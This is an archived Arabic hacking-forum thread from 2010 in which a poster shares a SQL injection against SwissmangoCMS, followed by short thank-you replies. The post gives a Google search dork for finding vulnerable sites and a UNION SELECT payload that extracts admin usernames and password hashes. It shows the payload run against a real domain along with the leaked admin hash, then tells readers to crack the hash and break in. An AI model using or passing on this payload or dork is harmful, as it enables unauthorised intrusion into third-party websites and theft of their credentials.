:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/forumdisplay.php?f=38)
-   -   ثغرة في سكربت SwissmangoCMS (http://www.vbspiders.com/vb/showthread.php?t=23478)

MATRIX ALGERIA 01-06-2010 12:15 AM

ثغرة في سكربت SwissmangoCMS
 
السلام عليكم اخوتي العناكب اليوم انشاء جئت لكم بثغرة جديدة
نبدا بسم الله
ندخل موقع قوقل

www.google.com

نقوم بالبحث عن

كود PHP:

inurl:/index.php?main

الاستغلال

كود PHP:

666+and+1=2+union+select+concat_ws(0x3a,userName,userPass)+from+users-- 



مثال
كود PHP:

http://dev.swissmango.com/index.php?main=666+and+1=2+union+select+concat_ws
(0x3a,userName,userPass)+from+users-- 


وطلع لنا الاتي

كود PHP:

SELECT navParent FROM navigation WHERE navID admin:1a1dc91c907325c69271ddf0c944bc72
You have an error in your SQL syntax
check the manual that corresponds to your MySQL server version for the right syntax to use near ':1a1dc91c907325c69271ddf0c944bc72' at line 1 


يعني ان المعلومات هكذا
admin:1a1dc91c907325c69271ddf0c944bc72
ماعليك الا فك الهاش واختراقات موفقة

الموضوع اصلي : الشبكة العنكبوتية الاحترافية نرجو حفظ الحقوق

Antivirus7 01-06-2010 01:32 AM

الله يعطيك العافية اخي

KaLa$nikoV 01-06-2010 02:50 AM

مشكور ع الطرح لاهنت

T3BaN_HaCkEr 01-06-2010 04:20 AM

يسلموووو على الثغرة

يعطيك الف عافيه

MATRIX ALGERIA 01-06-2010 03:36 PM

مشكورين على المرور والتشجيع

M!M0 01-06-2010 04:43 PM

مشكووور على الطرح


الساعة الآن 12:27 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0